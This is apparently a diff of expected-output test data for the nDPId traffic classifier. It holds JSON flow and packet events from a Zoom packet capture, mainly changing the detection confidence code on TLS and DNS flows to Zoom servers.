-00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470769,"flow_last_seen":1569520470790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470790,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470769,"flow_last_seen":1569520470790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470790,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1569520470801,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470801,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGI1bV9IxUwKgBdQG71lYtiv8U+ewS56ASqbDdrgAAAgQFrAQCCAp8tQexJZzgpQEDAww="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1569520470801,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470801,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFl7AqAF11fSMVNZWAbv57BLnLYr\/FYAQECyl5QAAAQEICiWc4Lx8tQex"} -00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470776,"flow_last_seen":1569520470801,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470801,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470742,"flow_last_seen":1569520470810,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470810,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470769,"flow_last_seen":1569520470814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470814,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470742,"flow_last_seen":1569520470820,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470820,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} 
-01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":195,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470755,"flow_last_seen":1569520470822,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470822,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01346{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":200,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470769,"flow_last_seen":1569520470822,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470822,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":204,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470776,"flow_last_seen":1569520470828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470828,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
-01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470755,"flow_last_seen":1569520470829,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470829,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} -01346{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470776,"flow_last_seen":1569520470837,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470837,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying 
HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470776,"flow_last_seen":1569520470801,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470801,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470742,"flow_last_seen":1569520470810,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470810,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470769,"flow_last_seen":1569520470814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470814,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470742,"flow_last_seen":1569520470820,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470820,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} 
+01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":195,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470755,"flow_last_seen":1569520470822,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470822,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01346{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":200,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470769,"flow_last_seen":1569520470822,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470822,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":204,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470776,"flow_last_seen":1569520470828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470828,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
+01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470755,"flow_last_seen":1569520470829,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470829,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +01346{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470776,"flow_last_seen":1569520470837,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470837,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying 
HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471147,"flow_last_seen":1569520471147,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520471147,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1569520471147,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1569520471147,"pkt":"EBMx8Tl2KDc3AG3ICABFAABCtGEAAP8Rg4LAqAF1wKgBAcfxADUALsLBHCQBAAABAAAAAAAADHpvb21mcm45OW1tcgR6b29tAnVzAAABAAE="} 
-00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471147,"flow_last_seen":1569520471147,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520471147,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfrn99mmr.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471147,"flow_last_seen":1569520471147,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520471147,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfrn99mmr.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
